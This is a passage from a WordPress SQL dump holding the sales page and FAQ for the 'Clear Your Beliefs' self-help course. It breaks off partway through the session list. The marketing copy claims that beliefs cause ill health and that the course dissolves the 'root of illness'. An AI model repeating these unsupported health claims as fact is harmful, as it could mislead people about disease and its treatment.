href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\n\n<strong>Q: How can I reach Customer Support?</strong>\n\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\n\n<strong>Q: What is your Privacy Policy?</strong>\n\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\n\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\n\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\n\n//', 'Clear Your Beliefs Program', '', 'inherit', 'closed', 'open', '', '1941-revision-v1', '', '', '2014-12-12 14:43:17', '2014-12-12 19:43:17', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2022, 2, '2014-12-12 12:21:41', '2014-12-12 17:21:41', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n&nbsp;\n<img class="bor-img-top no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="bor-img-bot no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n&nbsp;&nbsp;			<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p>You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.</p>\n\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.</p>\n<img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" />\n<h1>\nWhat If You Could Permanently Delete Old Habits And Patterns – So They Didn’t Come Back?</h1>\n<p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p>\n<p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p>\n&nbsp;			<a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I’m convinced!Take me to the program description,tell me about all the cool bonuses I’ll get,and how much it costs...</a>\n&nbsp;&nbsp;			<h1>\nWhy Does This Happen?</h1>\n<img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p>\n&nbsp;			<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p>\n<p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p>\n<img src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" />&nbsp;			<h1>Beliefs Are The Foundation Of Your Experience</h1>\n<p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p>\n\n<img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally create our reality with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n\n<h1>Upgrade Your Human Operating System</h1>\n<p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p>\n<p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p>\n\n<strong><em>I’m not enough.</em></strong>\n<strong><em>I can’t do it.</em></strong>\n<strong><em>I’m not worthy.</em></strong>\n<strong><strong><em>I’ll never be like them.</em></strong></strong>\n<strong><em>I’m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There’s something wrong with me.</em></strong>\n<strong><em>I’m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\n<p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p>\n<p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p>\n<p><strong>Here’s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong></p>\n<h1>The Garden Of Your Mind</h1>\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\n&nbsp;\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> It’s that simple.</strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n\nWhy did I say that?\nWhat’s wrong with me?\nWhy didn’t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n\n<strong><strong><strong>First: It’s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n<strong> In Session 5, you will:</strong>\n\nExamine your family and cultural beliefs about money, work, poverty and “deservingness.”\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n<strong> In Session 6, you will:</strong>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In 